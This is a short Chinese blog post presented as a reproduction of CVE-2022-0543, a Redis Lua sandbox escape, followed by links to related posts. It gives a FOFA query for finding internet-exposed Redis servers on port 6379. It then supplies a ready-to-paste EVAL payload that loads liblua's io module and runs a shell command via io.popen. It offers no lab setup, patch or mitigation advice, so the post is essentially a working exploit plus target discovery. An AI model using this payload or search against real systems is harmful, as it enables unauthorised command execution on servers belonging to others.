Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现

Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现

Redis如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。--那么这也就是redis未授权访问了

Redis的默认端口是6379 可以用空间测绘搜索,也可以用nmap等端口扫描工具来扫描

fofa语法搜索:port="6379" && protocol="redis"

用Another Redis Desktop Manager连接上数据库之后,在控制台输入以下命令

bash 复制代码
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

​​​​

相关推荐
Amd7949 天前
数据库安全性与权限管理
权限管理·访问控制·数据加密·数据库安全·用户认证·数据完整性·安全威胁
西风未眠1 年前
MongoDB的分片集群(二) :mongodb4.x分片集群离线搭建&开启安全认证
数据库·mongodb·数据库集群·数据库安全·分片集群
_长银1 年前
SQL安全:常见手段
数据库·sql·数据库安全
Scalzdp1 年前
SQL注入漏洞发现和利用,以及SQL注入的防护
数据库·信息安全·数据库安全·sql注入漏洞利用及防护
Naive`1 年前
Sql注入详解(原理篇)
数据库·sql·mysql·web安全·数据库安全